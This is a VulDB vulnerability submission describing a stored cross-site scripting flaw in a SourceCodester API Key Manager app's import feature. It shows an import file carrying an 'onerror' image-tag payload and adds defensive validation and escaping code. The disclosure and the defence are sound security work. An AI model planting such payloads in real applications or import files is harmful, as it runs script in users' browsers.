| Title | SourceCodester API Key Manager App Using HTML, CSS and JavaScript with Source Code 0 Cross Site Scripting |
|---|
| Description | The vulnerability lies in the import keys functionality, where any user can define additional tags containing JavaScript payloads. On load, the payload is executed within the local browser. In the import file below, the second entry in `tags` is the exploit payload:

```json
[
  {
    "id": "xss_tag_1",
    "name": "Legitimate API Key",
    "key": "sk_live_1234567890abcdef",
    "category": "payment",
    "tags": [
      "production",
      "<img src=x onerror=alert(1);>",
      "important"
    ],
    "notes": "This key is used for production payments",
    "created": "2026-01-03T17:41:04.147892Z",
    "lastUsed": null,
    "strength": "Strong"
  }
]
```

Codebase: https://www.sourcecodester.com/javascript/18600/api-key-manager-app-using-html-css-and-javascript-source-code.html |
|---|
| User | Kamran Saifullah (UID 4218) |
|---|
| Submission | 01/03/2026 20:40 (3 months ago) |
|---|
| Moderation | 01/04/2026 07:47 (11 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 339472 [SourceCodester API Key Manager App 1.0 Import Key cross site scripting] |
|---|
| Points | 17 |
|---|
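
A defensive counterpart to the report above, as an added example that is not code from the application or from the submission: it validates an import file before any record is stored and escapes text for the cases where it must be placed in an HTML string. The function names, the tag allowlist and the field list are assumptions derived from the sample import file; the application's own import and rendering code is not shown on this page.

```javascript
// Added example: names, limits and the tag allowlist are assumptions, not the app's code.
const TAG_PATTERN = /^[A-Za-z0-9 _.-]{1,32}$/; // assumed policy for tag text
const TEXT_FIELDS = ["id", "name", "key", "category", "notes"]; // from the sample file

// Escape text for the cases where it must be concatenated into an HTML string.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Parse an import file and split its records into accepted and rejected.
function validateImport(jsonText) {
  let records;
  try { records = JSON.parse(jsonText); }
  catch (err) { return { accepted: [], rejected: [{ reason: "not valid JSON" }] }; }
  if (!Array.isArray(records)) return { accepted: [], rejected: [{ reason: "top level is not an array" }] };
  const accepted = [], rejected = [];
  for (const rec of records) {
    const reason = checkRecord(rec);
    if (reason) rejected.push({ id: rec && rec.id, reason });
    else accepted.push(rec);
  }
  return { accepted, rejected };
}

// Returns null when the record is acceptable, otherwise the reason it is not.
function checkRecord(rec) {
  if (rec === null || typeof rec !== "object" || Array.isArray(rec)) return "record is not an object";
  for (const field of TEXT_FIELDS) {
    if (rec[field] != null && typeof rec[field] !== "string") return `field ${field} is not a string`;
  }
  if (!Array.isArray(rec.tags)) return "tags is not an array";
  const bad = rec.tags.find((t) => typeof t !== "string" || !TAG_PATTERN.test(t));
  return bad === undefined ? null : `tag rejected: ${JSON.stringify(bad)}`;
}

// Constructed sample: one clean record and one shaped like the record in the report.
const SAMPLE = JSON.stringify([
  { id: "ok_1", name: "Legitimate API Key", key: "sk_live_1234567890abcdef", category: "payment", tags: ["production", "important"] },
  { id: "xss_tag_1", name: "Legitimate API Key", key: "sk_live_1234567890abcdef", category: "payment", tags: ["production", "<img src=x onerror=alert(1);>", "important"] },
]);
console.log(validateImport(SAMPLE).rejected);
```

In the browser, assigning tag text through `textContent` instead of `innerHTML` keeps imported strings from being parsed as markup at that sink, which also covers free-text fields such as `notes` that an allowlist cannot reasonably constrain.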